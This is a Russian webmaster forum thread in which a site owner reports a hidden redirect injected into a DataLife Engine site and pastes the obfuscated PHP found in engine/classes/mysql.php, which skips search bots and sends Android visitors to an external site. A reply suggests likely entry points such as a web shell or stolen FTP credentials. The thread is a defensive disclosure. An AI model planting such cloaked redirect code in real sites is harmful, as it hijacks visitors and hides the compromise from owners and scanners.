Jump to content

Скрытый серверный редирект DLE (важно!)


Recommended Posts

Недавно задался вопросом, почему сайт имел посещаемость до 450 хостов в сутки, но через некоторое время просел до 170-220. Сегодня на очередной встрече я показывал свои работы, зашли на один из сайтов с планшета. Главная страница открылась, всё хорошо, затем переходим в "Контакты" и вуаля, нас перебрасывает на порно сайт. Любые остальные разделы также, то есть работает только главная страница.

 

Честно говоря был очень сильно удивлён. Перерыл все скрипты, затем стал смотреть файлы php и нашёл в engine/classes/mysql.php такой интересный код:

$gant = strtolower($_SERVER[strrev(strtoupper('tnega_resu_ptth'))]);$ref = $_SERVER[strrev(strtoupper('tsoh_ptth'))];
if(!preg_match('/crawl|andex|oogle|bot/i',$gant)) {
if((preg_match('/ndroi|htc_|htc-/i',$gant)) and (!isset ($_COOKIE['dle_user_id'])) and($_SERVER['REQUEST_URI'] != '/')) 
{header(strrev('=REREFER_PTTH&1=ru&lmth.41'.'/67namyrros/'.'stneilc'.'/cc.'.'slm'.'thx'.'//:pt'.'th :noi'.'tac'.'oL').$ref);exit;}}

Код почистил. Дырой оказалось CHMOD файла .htaccess, заменил его на 444.

 

Что самое интересное - яндекс вебмастер и другие "проверки на вирусы" ничего не находили. Стал проверять страницы разделов и статических страниц на сервисе secu, он показал серверный редирект на сторонний сайт.

 

Примерно год назад чистил сайт. Перед новым годом обновлял движок (лицензия), поэтому занесли его на сервер примерно пару месяцев назад. Проверяйте свои сайты, я нашёл на 2х.

 

ps. Отмечу, что данный редирект срабатывал с устройств android (в принципе по коду видно, на что он ориентирован). С iOS сайт отлично работал

Link to post
Share on other sites

Есть вопрос? Задай его профессиональным веб-мастерам, SEO и другим специалистам!

Код почистил. Дырой оказалось CHMOD файла .htaccess, заменил его на 444.

 

 

Вряд ли причина в чмоде. Нужно искать shell среди файлов, возможно в каталоге картинок (если есть дырочка и загрузчик картинок позволяет грузить файлы php), или же причина в утечке пароля к ftp или же вирусе на компьютере с которого осуществляется подключение к ftp, который отправляет злоумышленнику параметры доступа.

 

Ну и яндекс и проверки на вирусы не обязательно должны говорить, что ваш сайт несет опасность, т.к. для них это обычный редирект на порносайт (если там вируса нет, то все ништяк, просто ниша неочень) - может быть вы пожелали сами, чтобы пльзователи андроида шли на ..... :)))

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...